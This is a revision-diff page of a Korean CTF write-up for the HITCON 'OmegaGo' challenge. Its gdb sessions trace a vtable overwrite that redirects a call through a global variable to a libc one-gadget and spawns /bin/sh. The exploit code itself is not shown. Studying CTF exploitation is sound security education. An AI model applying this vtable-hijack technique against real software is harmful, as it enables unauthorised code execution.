Versions Compared

Old Version 27

changes.mady.by.user Lazenca.0x0

Saved on

compared with

New Version 28

changes.mady.by.user Lazenca.0x0

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

  • 다음과 같이 변경된 vtable 정보를 확인 할 수 있습니다.
    • AI vtable 영역은 0x1a37290 이며, 해당 영역에 gCmd 전역 변수(+4)의 주소가 저장되어 있습니다.

    • gCmd 전역 변수 +4(0x609440) 영역에는 One gadget의 주소 값이 저장되어 있습니다.

    • 해당 주소는 rax에 저장되어 호출되며, shell을 획득하게 됩니다.

Code Block
lazenca0x0@ubuntu:~$ gdb -q -p 59695
Attaching to process 59695
Reading symbols from /home/lazenca0x0/CTF/HITCON/OmegaGo/omega_go_6eef19dbb9f98b67af303f18978914d10d8f06ac...(no debugging symbols found)...done.
Reading symbols from /usr/lib/x86_64-linux-gnu/libstdc++.so.6...(no debugging symbols found)...done.
Reading symbols from /lib/x86_64-linux-gnu/libgcc_s.so.1...(no debugging symbols found)...done.
Reading symbols from /lib/x86_64-linux-gnu/libc.so.6...Reading symbols from /usr/lib/debug//lib/x86_64-linux-gnu/libc-2.23.so...done.
done.
Reading symbols from /lib/x86_64-linux-gnu/libm.so.6...Reading symbols from /usr/lib/debug//lib/x86_64-linux-gnu/libm-2.23.so...done.
done.
Reading symbols from /lib64/ld-linux-x86-64.so.2...Reading symbols from /usr/lib/debug//lib/x86_64-linux-gnu/ld-2.23.so...done.
done.


gdb-peda$ b *0x4017D0
Breakpoint 1 at 0x4017d0
gdb-peda$ c
Continuing.


Breakpoint 1, 0x00000000004017d0 in ?? ()
gdb-peda$ x/13i $rip
=> 0x4017d0:	mov    rax,QWORD PTR [rbp+rax*8-0x30]
   0x4017d5:	mov    rax,QWORD PTR [rax]
   0x4017d8:	mov    rax,QWORD PTR [rax]
   0x4017db:	mov    edx,DWORD PTR [rbp-0x5c]
   0x4017de:	sub    edx,0x1
   0x4017e1:	movsxd rdx,edx
   0x4017e4:	mov    rdi,QWORD PTR [rbp+rdx*8-0x30]
   0x4017e9:	lea    rsi,[rbp-0x60]
   0x4017ed:	lea    rcx,[rbp-0x64]
   0x4017f1:	mov    edx,DWORD PTR [rbp-0x5c]
   0x4017f4:	mov    r8,rsi
   0x4017f7:	mov    esi,0x609fc0
   0x4017fc:	call   rax
gdb-peda$ i r rax
rax            0x0	0x0
gdb-peda$ i r rbp
rbp            0x7ffdb99059e0	0x7ffdb99059e0
gdb-peda$ p/x 0x7ffdb99059e0 - 0x30
$1 = 0x7ffdb99059b0
gdb-peda$ x/gx 0x7ffdb99059b0
0x7ffdb99059b0:	0x0000000001a37290
gdb-peda$ x/gx 0x0000000001a37290
0x1a37290:	0x0000000000609440
gdb-peda$ x/gx 0x0000000000609440
0x609440:	0x00007f10d2973117
gdb-peda$ x/5i 0x00007f10d2973117
   0x7f10d2973117 <exec_comm+2263>:	mov    rax,QWORD PTR [rip+0x2d2d9a]        # 0x7f10d2c45eb8
   0x7f10d297311e <exec_comm+2270>:	lea    rsi,[rsp+0x70]
   0x7f10d2973123 <exec_comm+2275>:	lea    rdi,[rip+0x9bbed]        # 0x7f10d2a0ed17
   0x7f10d297312a <exec_comm+2282>:	mov    rdx,QWORD PTR [rax]
   0x7f10d297312d <exec_comm+2285>:	call   0x7f10d294e770 <execve>
gdb-peda$ b *0x4017fc
Breakpoint 2 at 0x4017fc
gdb-peda$ c
Continuing.


Breakpoint 2, 0x00000000004017fc in ?? ()
gdb-peda$ i r rax
rax            0x7f10d2973117	0x7f10d2973117
gdb-peda$ c
Continuing.
process 59695 is executing new program: /bin/dash

  • 다음과 같이 vtable을 Overwirte을 할 수 있습니다.

    • gameInfo.board[4]영역에 값으로 0x609440을 설정합니다.
      • 사용자 입력 값을 저장하는 전역변수 command(0x60943C)주소 값에 0x4을 더한 값입니다.
    • gameInfo.board[1] 영역까지 Heap 주소로 채웁니다.
    • 0x*****550 영역에 gameInfo.board[4]에 저장된 값이 저장됩니다.
      • 좌표값 뒤에 어떤 값이든 7개를 입력할 수 있습니다.
        • Ex)A19!@#$%^&
      • 0x609440 영역에 execve("/bin/sh") 코드의 주소를 저장하면 shell을 획득할 수 있습니다.
  • 다음은 디버깅을 통해 확인한 내용입니다.
    • gameInfo.board[1] 영역에 저장된 heap 주소는 0x16a5530 입니다.
    • 0x16a5530을 기준으로 gameInfo.board[4]에 0x609440이 저장되어 있습니다.
      • 즉, vtable을 0x609440으로 덮어쓴 것입니다.
    • 0x609440 영역에는 execve("/bin/sh") 코드의 주소가 저장되어 있습니다.
Code Block
titleOverwirte the vtable 
autolycos@ubuntu:~$ sudo gdb -q -p 6027
Attaching to process 6027
...
(gdb) b *0x04017FC
Breakpoint 1 at 0x4017fc
(gdb) x/12gx 0x609FC0
0x609fc0:	0x00000000016a54a0	0xaaaaaaaaaaaaaaaa
0x609fd0:	0x40000002aaaaaaaa	0x0000000555555555
0x609fe0:	0x0000000000609440	0x0000010000000000
0x609ff0:	0x1800000000000000	0xaaaa8000000008a4
0x60a000:	0x55550000000aaaaa	0x5555555555555555
0x60a010:	0x0000055555555555	0x0000000000000000
(gdb) c
Continuing.

Breakpoint 1, 0x00000000004017fc in ?? ()
(gdb) x/12gx 0x609FC0
0x609fc0:	0x00000000016a54a0	0x00000000016a5530
0x609fd0:	0x4000000aaaaaaaaa	0x0000000555555555
0x609fe0:	0x0000000000609440	0x0000010000000000
0x609ff0:	0x1800000000000000	0xaaaa8000000008a4
0x60a000:	0x55550000000aaaaa	0x5555555555555555
0x60a010:	0x0000055555555555	0x0000000000000000

(gdb) x/18gx 0x00000000016a5530
0x16a5530:	0x00000000016a54a0	0xaaaaaaaaaaaaaaaa
0x16a5540:	0x4000000aaaaaaaaa	0x0000000555555555
0x16a5550:	0x0000000000609440	0x0000010000000000
0x16a5560:	0x1800000000000000	0xaaaa8000000008a4
0x16a5570:	0x55550000000aaaaa	0x5555555555555555
0x16a5580:	0x0000055555555555	0x0000000000000000
0x16a5590:	0x0000000500000004	0x5000010000000058
0x16a55a0:	0x40667feb65a9a800	0x4063bc970b49e01e
0x16a55b0:	0x0000000000000120	0x0000000000000091

(gdb) x/gx 0x16a5550
0x16a5550:	0x0000000000609440
(gdb) x/gx 0x0000000000609440
0x609440:	0x00007f5d9c93a6bd
(gdb) c
Continuing.
process 6027 is executing new program: /bin/dash
Warning:
Cannot insert breakpoint 1.
Cannot access memory at address 0x4017fc

(gdb)
Code Block
titlevtable -> 0x
(gdb) b *0x4017D0
Breakpoint 1 at 0x4017d0

(gdb) b *0x04017FC
Breakpoint 2 at 0x4017fc


(gdb) c
Continuing.
Breakpoint 1, 0x00000000004017d0 in ?? ()

(gdb) x/3i $rip
=> 0x4017d0:	mov    rax,QWORD PTR [rbp+rax*8-0x30]
   0x4017d5:	mov    rax,QWORD PTR [rax]
   0x4017d8:	mov    rax,QWORD PTR [rax]

(gdb) ni
0x00000000004017d5 in ?? ()
(gdb) i r rax

rax            0x1919550	26318160

(gdb) ni
0x00000000004017d8 in ?? ()
(gdb) i r rax
rax            0x609440	6329408

(gdb) ni
0x00000000004017db in ?? ()
(gdb) i r rax
rax            0x7fa236c046bd	140334680000189

(gdb) c
Continuing.

Breakpoint 2, 0x00000000004017fc in ?? ()
(gdb) x/i $rip
=> 0x4017fc:	call   rax
(gdb) i r rax
rax            0x7fa236c046bd	140334680000189
(gdb)

Exploit Code

Ubuntu 16.04.3 LTS

...